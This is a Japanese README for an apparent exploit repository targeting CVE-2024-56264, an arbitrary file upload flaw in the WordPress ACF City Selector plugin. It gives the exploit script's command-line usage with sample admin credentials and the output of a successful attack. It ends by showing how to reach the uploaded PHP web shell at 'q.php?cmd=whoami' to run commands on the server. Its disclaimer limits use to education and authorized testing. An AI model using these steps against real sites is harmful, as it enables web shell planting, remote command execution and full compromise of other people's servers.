
WordPress ACF City Selector プラグイン <= 1.14.0 - 任意のファイルアップロードの脆弱性
このリポジトリには、WordPressプラグイン ACF City Selector(バージョン <= 1.14.0)で見つかった任意ファイルアップロード脆弱性であるCVE-2024-56264のエクスプロイトが含まれています。この脆弱性により、攻撃者は脆弱なWordPressインスタンスに**悪意のあるPHPファイル(ウェブシェル)**をアップロードし、サーバー上で任意のコマンドを実行できます。
<= 1.14.0ACF City Selectorプラグインはアップロードされたファイルを適切に検証せず、攻撃者が制限を回避して任意のPHPファイルをアップロードできるようにします。悪意のあるPHPファイルがアップロードされると、攻撃者はリモートからシステムコマンドを実行でき、サーバー全体の侵害につながります。
以下のインストールが必要です:
requests モジュール(インストール: pip install requests)必要な依存関係はすべて以下のコマンドでインストールできます:
pip install -r requirements.txt
エクスプロイトの実行:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
エクスプロイトが成功すると、次のように表示されます:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
成功した場合、アップロードされたシェルに以下のURLでアクセスします:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
これにより、サーバー上でリモートコマンド実行が可能になります。
このスクリプトは教育目的および許可されたセキュリティテスト目的のみを意図しています。無許可での使用は違法であり、深刻な結果を招く可能性があります。著者はこのエクスプロイトの誤用について一切の責任を負いません。